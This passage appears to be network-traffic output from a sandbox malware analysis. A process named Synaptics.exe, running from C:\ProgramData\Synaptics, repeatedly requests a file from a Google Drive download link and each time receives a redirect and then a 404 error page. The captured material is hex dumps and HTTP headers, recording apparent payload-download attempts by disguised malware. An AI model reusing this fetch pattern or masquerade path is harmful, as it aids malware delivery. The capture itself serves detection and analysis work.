                                                                                                              2024-12-30 10:36:04 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 67 77 53 50 6d 48 52 39 4d 58 76 63 50 66 50 45 46 51 2d 74 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="DgwSPmHR9MXvcPfPEFQ-tg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:04 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              34192.168.2.449792142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:04 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=RqDXBJunwwjj2_C9QPMQBvl40xPXXJ0y_fIC7Up7BSsJU4ulAIR3W4UGJa019yDdcw-wU2ZCjiWOf6Jj4qcrHWJB3js1k8IA-AFK1jiyJsHPeBg6Vie9fWRBqVpuNHeGBLEqQFDOfY3JM5cdCJbfnFxHup-jxh0_JlhrUKdSpndAWo109eAkm-E
                                                                                                              2024-12-30 10:36:04 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:04 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-xuLWizHg-2yPTiVpINPvZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              35192.168.2.449793142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:04 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=RqDXBJunwwjj2_C9QPMQBvl40xPXXJ0y_fIC7Up7BSsJU4ulAIR3W4UGJa019yDdcw-wU2ZCjiWOf6Jj4qcrHWJB3js1k8IA-AFK1jiyJsHPeBg6Vie9fWRBqVpuNHeGBLEqQFDOfY3JM5cdCJbfnFxHup-jxh0_JlhrUKdSpndAWo109eAkm-E
                                                                                                              2024-12-30 10:36:05 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:04 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-0aOynHecOJIJTXF5rn6Bfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              36192.168.2.449794142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:04 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:05 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC702cmuWsXn2m-dcu-WukJu6RTvwK88Zc9rHS1y_V4ytGd7RgO_XJ3ZZAyvSjQt5l3FF3UEKuQ
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:05 GMT
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-fZakuaf-B8iCvLRPeDu3_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:05 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:05 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 70 4b 79 6b 74 44 56 58 63 70 30 31 64 45 70 73 67 61 38 4a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="VpKyktDVXcp01dEpsga8Jw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:05 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              37192.168.2.449795142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:04 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:05 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5oi5i29iQP001zNMF8CXNgMksE1eZEDcQyAhToSbQErtFJU-V39lo7qwcb0NUnk981
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:05 GMT
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-PX9-0Bm7Z8f5iqwOWYPEjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:05 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:05 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 74 45 37 31 79 66 35 55 67 74 38 57 2d 55 65 34 79 2d 50 48 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="ftE71yf5Ugt8W-Ue4y-PHA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:05 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              38192.168.2.449796142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:05 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=RqDXBJunwwjj2_C9QPMQBvl40xPXXJ0y_fIC7Up7BSsJU4ulAIR3W4UGJa019yDdcw-wU2ZCjiWOf6Jj4qcrHWJB3js1k8IA-AFK1jiyJsHPeBg6Vie9fWRBqVpuNHeGBLEqQFDOfY3JM5cdCJbfnFxHup-jxh0_JlhrUKdSpndAWo109eAkm-E
                                                                                                              2024-12-30 10:36:05 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:05 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-dCo0wq0I7cqgFxClwWhPXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              39192.168.2.449797142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:05 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM
                                                                                                              2024-12-30 10:36:05 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:05 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-EZyWZU5S13vvju1HxJLPww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              40192.168.2.449799142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:05 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:06 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5iASZcT6NwIC-1CiQ2AmelYITs748FqaQubbLNhz21R-_TSTIAEhPLV3Dm57pjihAVscr9Z-Y
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:06 GMT
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-fMVZVNUnRG_TL-jE0oFsvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:06 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:06 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 5a 6d 7a 4a 4f 42 59 6f 4f 48 72 50 38 4e 62 6f 45 31 4f 34 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="mZmzJOBYoOHrP8NboE1O4g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
